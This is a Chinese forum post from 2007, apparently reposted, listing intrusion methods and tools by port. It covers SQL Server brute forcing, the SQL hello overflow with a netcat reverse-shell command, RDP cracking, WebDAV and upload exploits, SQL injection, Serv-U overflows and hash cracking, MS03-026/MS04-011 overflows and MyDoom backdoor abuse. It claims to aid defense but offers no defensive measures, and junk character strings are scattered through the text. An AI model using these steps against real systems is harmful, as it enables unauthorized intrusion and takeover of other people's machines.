 该用户从未签到
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
* p# k9 i& d9 W 0 t) _9 @9 [% J% c, m' L
z/ Z% Q, ^: Y1 W
1. 1433端口入侵 % v- V' \ L* `' t$ Z" |
3 T' g6 f4 @/ \! Q7 I scanport.exe 查有1433的机器
8 ?# k- `) u+ \+ `; e% M2 Y0 o1 q
SQLScanPass.exe 进行字典暴破(字典是关键) ) T/ N! c4 |: P4 ~4 P
. c" r6 d/ ?% U) G4 o 最后 SQLTools.exe入侵
% w$ z: d! J: l9 F7 p. S2 h
: s2 T1 K/ @! f ============================= 9 m8 [& v. m1 n( m. ~0 v
4 W$ |1 E" H( K7 x0 T 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 : O0 J1 A5 O2 D
; Z6 m v) n d* `6 s$ a1 I$ v
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 - M" {' t0 w) c+ h& \8 [
% _: O* {$ o; @) { (以上反向的,测试成功)
# o: W1 ]* u1 H, x; |
( x6 q" \ J5 g$ e4 R9 p1 t sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 5 F/ b: [) u( c0 D
) o* R* q$ D3 D
2. 4899端口入侵
6 x& g7 ~! W$ v c6 L1 u4 P6 w5 X3 M
用4899过滤器.exe,扫描空口令的机器
8 q$ ^# ?- }% g$ I' A; {# w
- @+ r3 ^1 G) E6 A' L 3. 3899的入侵
# _# z9 _7 a. p/ o7 y+ Z8 t! [$ y8 o K/ K- S1 k/ W
对很早的机器,可以试试3389的溢出(win3389ex.exe) 0 ]" C) a t! v+ g b
* r- d' ~0 ^# t7 @# |$ V7 I9 H/ l
对2000的机器,可以试试字典暴破。(tscrack.exe) ( E/ a+ V+ q8 O8 w2 W. ~+ S8 r
9 F, |+ a0 p4 v/ T( e6 ?, Q 4. 80入侵 + b( t$ w6 J7 F3 v6 d& z2 ^/ P
/ b$ L$ A: Q4 G% t! C! e 对sp3以前的机器,可以用webdav入侵;
# O8 G" c$ ]. V9 A. }2 ^7 k
1 w7 B. p/ B; Q6 B 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) + P6 w0 N; \7 \ W( Z+ e }: g, S
6 Y3 u, @8 T: `7 Z9 R" p1 Z4 I- f 可以利用SQL进行注入。(小榕的注入软件)。
5 {) ]- f/ d5 w+ L5 a0 a( R/ I7 y9 M ~4 }( T
5. serv-u入侵(21端口) / @3 Q/ c- f, i( u' d% g6 T1 p
8 |# P/ M/ v8 e) h8 o6 x 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) / M7 }9 M# M' G. Q$ c# a7 r5 E
% G( r& l" A3 _" ~0 ? 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
- b, X, c) I l4 S1 I: i; D" e1 ~ b4 `2 i+ g. w- ?
======================================
% o. W& }! a" f; L2 Y& }4 i) ^
6 l ~# {' B1 `: e6 }; ] 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
9 r+ {+ j9 L9 T* ^" p0 w3 A& i: u+ t+ L, N3 \
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6 P' n. N) A) e+ I5 ^. v3 Z& r
9 x; v" \. P2 O: ? 6. 554端口
, X- @9 U1 P+ N0 z( R4 g$ K3 g5 m, m7 Y
用real554.exe入侵。
$ z' ]% c! ~* f$ w- y9 m / Q- C" J0 ?, P& V0 E
7. 6129端口 & e# }+ r+ y9 w. d% z- X4 b
& K% w! R* j$ `: I( n- b& A8 f
用DameWare6129.exe入侵。 % I( u! O. x6 i* p+ g- @4 w7 R/ r
8 W9 ]/ O1 q% d) g b3 r% P. u$ I' r
8. 系统漏洞 + E2 g. e+ N- Y+ q4 v
5 U! t' v7 L# }% e- l 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, ) M0 O# p- a/ W6 u$ L
6 P- U: o$ V% G! |- E8 F5 s 进行溢出入侵。 * ?% N9 k: j( ^7 F
/ b! `& k5 y* G9 S2 C
9. 3127等端口 ; @. F2 c( g0 A; U0 c
8 X- \/ h& M, Z: a: e4 E% x
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 ' Y+ b l. r5 S6 C8 `. s& ]3 {7 e
4 h% w1 s _" y6 i
10. 其他入侵
; s2 c) I7 d# m6 z0 z) ^- V
; M0 d/ l% n- o1 @ 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
" _, H! r H+ r6 o, }0 Z- R4 }; P1 E* j
| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
转发到微博
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
